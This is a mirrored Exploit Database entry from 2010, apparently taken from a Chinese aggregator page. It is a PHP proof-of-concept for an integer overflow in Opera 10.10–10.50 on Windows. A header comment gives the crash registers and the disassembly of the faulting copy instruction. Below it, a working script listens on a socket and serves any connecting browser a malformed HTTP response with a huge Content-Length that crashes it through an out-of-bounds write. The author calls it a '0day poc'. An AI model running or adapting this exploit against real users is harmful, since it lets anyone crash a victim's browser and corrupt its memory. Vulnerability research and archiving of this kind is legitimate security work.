Opera 10.50 – integer Overflow

• Exploit Database
• 15 阅读

• 作者： Marcin Ressel
  日期： 2010-03-03
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11622/

• <?php
  
  /*
  *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  *-------------------------------------------------------------------------------
  * Opera 10.10 - 10.50 
  * Title: Integer overflow leading 
  *to 
  *out of bounds array access R/W
  *0day poc
  * Autor: Marcin Ressel aka ~echo 
  * Date: 3.03.2010 
  * Software: http://choice.opera.com/download/get.pl?thanks=true&sub=true&wu=1&wulang=pl&info=1
  * Version: Tested on 10.10 , 10.50 but i thing other version is vulnerable to 
  * Platform: Windows xp home sp 2 pl
  * Muz: http://totgeliebt.wrzuta.pl/audio/6dXgnLnsI82 (podniecilem sie) 
  * Contanct: pokoFac_nerda@tvn24.pl
  *
  * @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  *
  * Exception: Access violation when writing to [01A23000]
  * Registers: EAX 03D89DF2
   ECX 3FFF3ABE
   EDX 00000002
   EBX FFFFFFFF
   ESP 0012F158
   EBP 0012F160
   ESI 03DBB2F8
   EDI 01A23000
   EIP 6781E0BA Opera_12.6781E0BA
  
  * DUMP Function:
  6781E060 55 PUSH EBP
  6781E061 8BEC MOV EBP,ESP
  6781E063 57 PUSH EDI
  6781E064 56 PUSH ESI
  6781E065 8B75 0CMOV ESI,DWORD PTR SS:[EBP+C]
  6781E068 8B4D 10MOV ECX,DWORD PTR SS:[EBP+10]
  6781E06B 8B7D 08MOV EDI,DWORD PTR SS:[EBP+8]
  6781E06E 8BC1 MOV EAX,ECX
  6781E070 8BD1 MOV EDX,ECX
  6781E072 03C6 ADD EAX,ESI
  6781E074 3BFE CMP EDI,ESI
  6781E076 76 08JBE SHORT Opera_12.6781E080
  6781E078 3BF8 CMP EDI,EAX
  6781E07A 0F82 A4010000JB Opera_12.6781E224
  6781E080 81F9 00010000CMP ECX,100
  6781E086 72 1FJB SHORT Opera_12.6781E0A7
  6781E088 833D 882AF167 00 CMP DWORD PTR DS:[67F12A88],0
  6781E08F 74 16JE SHORT Opera_12.6781E0A7
  6781E091 57 PUSH EDI
  6781E092 56 PUSH ESI
  6781E093 83E7 0FAND EDI,0F
  6781E096 83E6 0FAND ESI,0F
  6781E099 3BFE CMP EDI,ESI
  6781E09B 5E POP ESI
  6781E09C 5F POP EDI
  6781E09D 75 08JNZ SHORT Opera_12.6781E0A7
  6781E09F 5E POP ESI
  6781E0A0 5F POP EDI
  6781E0A1 5D POP EBP
  6781E0A2^E9 88CEFFFFJMP Opera_12.6781AF2F
  6781E0A7 F7C7 03000000TEST EDI,3
  6781E0AD 75 15JNZ SHORT Opera_12.6781E0C4
  6781E0AF C1E9 02SHR ECX,2
  6781E0B2 83E2 03AND EDX,3
  6781E0B5 83F9 08CMP ECX,8
  6781E0B8 72 2AJB SHORT Opera_12.6781E0E4
   BUG->6781E0BA F3:A5REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]<-- BUG 
  6781E0BC FF2495 D4E18167JMP DWORD PTR DS:[EDX*4+6781E1D4]
  6781E0C3 90 NOP
  6781E0C4 8BC7 MOV EAX,EDI
  6781E0C6 BA 03000000MOV EDX,3
  6781E0CB 83E9 04SUB ECX,4
  6781E0CE 72 0CJB SHORT Opera_12.6781E0DC
  6781E0D0 83E0 03AND EAX,3
  6781E0D3 03C8 ADD ECX,EAX
  6781E0D5 FF2485 E8E08167JMP DWORD PTR DS:[EAX*4+6781E0E8]
  6781E0DC FF248D E4E18167JMP DWORD PTR DS:[ECX*4+6781E1E4]
  6781E0E3 90 NOP
  6781E0E4 FF248D 68E18167JMP DWORD PTR DS:[ECX*4+6781E168]
  ...
  *---------------------------------------------------------------------------
  * BREAK AT 6781E0BA
  ECX=3FFF3ABE (decimal 1073691326.)
  DS:[ESI]=[03DBB2F8]=00000000
  ES:[EDI]=[01A23000]=???
  *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  *
  */
  if(strtolower(substr($_ENV['OS'],0,3)) == "win") define('OS','win');
  else define('OS','nix');
   if(!extension_loaded('php_sockets'))
   {
  if((OS == 'win') && (!@dl('php_sockets.dll')) ||
  ((OS == 'nix') && (!@dl('php_sockets.so')))) 
  die('fatal php_sockets.[dll/so] '.
  'not loaded '."\r\n");//.__line__.' '.__file__."\r\n");
   } 
  /*Generated by my own fuzzer*/
  $EVIL = 'HTTP/1.1 200 ok'."\r\n".
  'Transfer-Encoding: identity'."\r\n".
  'Date: thu 28 dec 2003 12:4:33 gmt'."\r\n".
  'Server: moj zuy server'."\r\n".
  'Set-Cookie: psid=d6dd02e9957fb162d2385ca6f2829a73;path=C:/'."\r\n".
  'Content-Location: file://C:/boot.ini'."\r\n".
  'Vary:negotiate,accept-language,accept-charset'."\r\n".
  'Tcn: choice'."\r\n".
  'Last-modified: sun,21 nov 2010 22:22:22 gmt'."\r\n".
  'Etag: "3861-5c6-1b28fa80;386a-9dc-1b28fa80"'."\r\n".
  'Accept-Ranges: bytes'."\r\n".
  'Cache-Control: max-age=0'."\r\n".
  'Expires: mon, 22 feb 2010 18:31:20 gmt'."\r\n".
  'Content-Encoding: identity'."\r\n".
  'Content-Length:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999666'."\r\n".
  'Via: 1.1 cache.zuo.pl:3128 (squid/2.7.stable6)'."\r\n".
  'Keep-Alive: timeout=15, max=300'."\r\n".
  'Connection: keep-alive'."\r\n".
  'Content-Type: text/html; charset=iso-8859-2'."\r\n".
  'Age: 1'."\r\n".
  'Allow: GET,HEAD'."\r\n".
  'Content-Disposition: inline'."\r\n".
  'Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ=='."\r\n".
  'Warning: 199 Miscellaneous warning'."\r\n".
  'Trailer: Max-Forwards'."\r\n".
  'Location: chrome://inspector/content/viewers/dom/dom.xul'."\r\n".
  'Content-Range: bytes 21010-47021/47022'."\r\n".
  'Content-Language: pl'."\r\n\r\n".
  '<html><head></head><body style="background-color:red;color:white;text-align:center;"><b>seq_end</b><script>location.href="http://swswqosksqowkd";</script></body></html>';
  $buster = $argc - 1;// - 1;
  if($buster > 0)
  {
  for($i = 1; $i<$buster; $i+=2) 
  if(('-port' == $argv[$i]) && ((int)$argv[$i + 1] > 0)) $PORT = $argv[$i + 1];
  }
  else $PORT = 81;
  if(!($SOCKET = socket_create_listen($PORT)))
   die('fatal socket init failed'."\r\n");
  socket_set_option($SOCKET,SOL_SOCKET,
  SO_RCVTIMEO,array("sec"=>3,"usec"=>0));
  echo('SOCKET READY AT PORT '.$PORT."\r\n".
   'Now connect here via opera'."\r\n"); 
  if($CONNECT = socket_accept($SOCKET))
  {
  $recv_buffer = null;
  echo('Connection ok '."\r\n");
  if(socket_recv($CONNECT,$recv_buffer,8,/*msg_dontwait*/MSG_WAITALL))
  {
  if(!@socket_write($CONNECT,$EVIL))
  {
  socket_close($CONNECT);
  socket_close($SOCKET);
  die('I cant send payload !'."\r\n"); 
  } 
  } 
  else echo('Something wrong with client side'."\r\n");
  usleep(120000);
  socket_close($CONNECT);
  socket_close($SOCKET); 
  }
  echo('OK ya browser must be death now'."\r\n".
   'Have a nice day lol'."\r\n"); 
  
  //[2010-03-03 20:47:46]
  //i cut be milion dolar man ;=
  ?>